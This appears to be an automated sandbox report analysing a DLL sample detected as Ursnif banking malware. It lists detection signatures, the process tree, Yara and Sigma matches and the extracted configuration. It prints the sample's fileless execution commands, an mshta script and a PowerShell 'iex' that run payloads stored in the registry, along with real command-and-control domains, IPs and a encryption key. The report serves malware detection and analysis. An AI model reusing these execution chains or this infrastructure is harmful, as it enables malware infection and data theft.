Play interactive tour

Edit tour

Windows Analysis Report 2790000.dll

Overview

General Information

Sample Name:	2790000.dll
Analysis ID:	444655
MD5:	c40709736c45151601de6db50f379d8b
SHA1:	96fcdac225106f13726477d898a4939ccfcd4781
SHA256:	56b998448c4cd2240edcf0446c8bc7da54f4568ba99d1f3774c43af202aac995
Tags:	dll
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Sigma detected: Encoded IEX

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Ursnif

Changes memory attributes in foreign processes to executable or writable

Compiles code for process injection (via .Net compiler)

Creates a thread in another existing process (thread injection)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Sigma detected: MSHTA Spawning Windows Shell

Sigma detected: Mshta Spawning Windows Shell

Sigma detected: Suspicious Csc.exe Source File Folder

Suspicious powershell command line found

Writes or reads registry keys via WMI

Writes registry values via WMI

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Compiles C# or VB.Net code

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query CPU information (cpuid)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Registers a DLL

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6560 cmdline: loaddll32.exe 'C:\Users\user\Desktop\2790000.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 6592 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2790000.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6632 cmdline: rundll32.exe 'C:\Users\user\Desktop\2790000.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

regsvr32.exe (PID: 6620 cmdline: regsvr32.exe /s C:\Users\user\Desktop\2790000.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

iexplore.exe (PID: 6672 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6760 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6992 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17426 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6840 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17430 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 4980 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82966 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 1808 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82970 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 684 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82982 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 5504 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17460 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 4864 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17468 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 4984 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17472 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 1016 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17480 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 4576 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83036 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6796 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17500 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 5500 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83052 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 5440 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17514 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6388 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17520 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 5728 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:279558 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6460 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83084 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 5348 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83090 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 740 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17546 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 4864 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83102 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

rundll32.exe (PID: 6716 cmdline: rundll32.exe C:\Users\user\Desktop\2790000.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

control.exe (PID: 5512 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)

mshta.exe (PID: 5492 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Vo0g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Vo0g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

powershell.exe (PID: 5872 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 5020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 5068 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 5900 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD796.tmp' 'c:\Users\user\AppData\Local\Temp\rzslcw3n\CSCA64EAED44D2B4776864E5EDA5D4E8B86.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

csc.exe (PID: 3220 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 6260 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES30B.tmp' 'c:\Users\user\AppData\Local\Temp\rpyoew2f\CSCDF3AABDF3FB34DF1A43A4F7FD45C9671.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

mshta.exe (PID: 6520 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>N4ot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(N4ot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

powershell.exe (PID: 6644 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 4596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 4432 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 5940 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1395.tmp' 'c:\Users\user\AppData\Local\Temp\xwrbq4ie\CSCC07B09CA405E4901BCF4DD90291B57CA.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

mshta.exe (PID: 3976 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Nohx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nohx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

powershell.exe (PID: 6244 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 1740 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 1808 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1D78.tmp' 'c:\Users\user\AppData\Local\Temp\pkkmtuzt\CSC7DF2BB886B1A41BB8B841DD3834E0B8.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "uiTXezezuapGKYR5Hmb7kdSK6au8TKB7wW9g5rwW5i1COxT1S+zuTy9YoTvI7hEm3kZdxYsJDG0+aStAKO8pzy41ZgWbaYpVgP+XSgAT7qWoXdAS/gVbMTJCCqNHkAtniUmHicelSYpHYminzht/W5i+89jC9sbo8vwV/qG0cnCdraqUqpCPQT4N25ybpFXm", "c2_domain": ["cdp.geotrust.com", "217.12.221.28", "195.123.247.51", "195.123.213.89", "qpwoeirutyzmxncbp2.xyz", "pqowieurytalskdjp2.xyz", "wopqrituysakldfap2.xyz"], "dns_server": ["107.174.86.134", "107.175.127.22"], "DGA_count": "10", "ip_check_url": ["api.wipmania.com", "ipinfo.io/ip"], "server": "12", "serpent_key": "10291029JSRABBIT", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "120", "time_value": "120", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "120", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "120", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "120", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "5456", "capture_window_title?(CRC_KEYLOGLIST)": "", "SetWaitableTimer_value": "60"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.718768044.0000000001EA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.792588340.0000000005208000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.910870766.000000000500C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000007.00000003.743986098.0000000005848000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.754576282.0000000005068000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000007.00000003.743884780.0000000005848000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.718843741.0000000001EA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.754698141.0000000005068000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.754769459.0000000005068000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000032.00000003.921653707.000002009624C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.866559376.0000000004E6C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000007.00000003.918784964.0000000006548000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.887362979.0000000004318000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.754654918.0000000005068000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000007.00000003.743778425.0000000005848000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.792300169.0000000005208000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000007.00000003.743828986.0000000005848000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.792520115.0000000005208000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.718744882.0000000001EA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.792349818.0000000005208000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000032.00000003.921759909.000002009624C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000007.00000003.744005054.0000000005848000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.886778931.0000000004318000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.718819209.0000000001EA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000007.00000003.743935552.0000000005848000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.792420602.0000000005208000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.792562195.0000000005208000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.754876807.0000000005068000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.887204962.0000000004318000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.718696614.0000000001EA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.886970529.0000000004318000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.718647612.0000000001EA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.754836366.0000000005068000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000007.00000003.858457272.000000000564C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000032.00000003.921808684.000002009624C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.824971303.0000000001CAC000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000007.00000003.744015390.0000000005848000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000007.00000003.743688599.0000000005848000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.718721890.0000000001EA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.887090567.0000000004318000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.887042071.0000000004318000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.718792278.0000000001EA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.754897105.0000000005068000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.887180889.0000000004318000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.887136487.0000000004318000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.792489565.0000000005208000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.792387675.0000000005208000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.754923089.0000000005068000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000002.940528675.0000000005D38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 6632	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: loaddll32.exe PID: 6560	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 50 entries

Sigma Overview

System Summary:

Sigma detected: Encoded IEX

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Vo0g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Vo0g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5492, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 5872

Sigma detected: MSHTA Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Vo0g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Vo0g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5492, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 5872

Sigma detected: Mshta Spawning Windows Shell

Show sources

Source: Process started

Sigma detected: Suspicious Csc.exe Source File Folder

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5872, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.cmdline', ProcessId: 5068

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Vo0g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Vo0g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5492, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 5872

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: 2790000.dll

Avira: detected

Found malware configuration

Show sources

Source: 00000007.00000002.936762270.00000000033D0000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"RSA Public Key": "uiTXezezuapGKYR5Hmb7kdSK6au8TKB7wW9g5rwW5i1COxT1S+zuTy9YoTvI7hEm3kZdxYsJDG0+aStAKO8pzy41ZgWbaYpVgP+XSgAT7qWoXdAS/gVbMTJCCqNHkAtniUmHicelSYpHYminzht/W5i+89jC9sbo8vwV/qG0cnCdraqUqpCPQT4N25ybpFXm", "c2_domain": ["cdp.geotrust.com", "217.12.221.28", "195.123.247.51", "195.123.213.89", "qpwoeirutyzmxncbp2.xyz", "pqowieurytalskdjp2.xyz", "wopqrituysakldfap2.xyz"], "dns_server": ["107.174.86.134", "107.175.127.22"], "DGA_count": "10", "ip_check_url": ["api.wipmania.com", "ipinfo.io/ip"], "server": "12", "serpent_key": "10291029JSRABBIT", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "120", "time_value": "120", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "120", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "120", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "120", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "5456", "capture_window_title?(CRC_KEYLOGLIST)": "", "SetWaitableTimer_value": "60"}

Machine Learning detection for sample

Show sources

Source: 2790000.dll

Joe Sandbox ML: detected

Source: 0.2.loaddll32.exe.10000000.2.unpack	Avira: Label: TR/Crypt.XPACK.Gen8
Source: 7.2.rundll32.exe.10000000.4.unpack	Avira: Label: TR/Crypt.XPACK.Gen8

Source: 2790000.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.4:49761 version: TLS 1.2
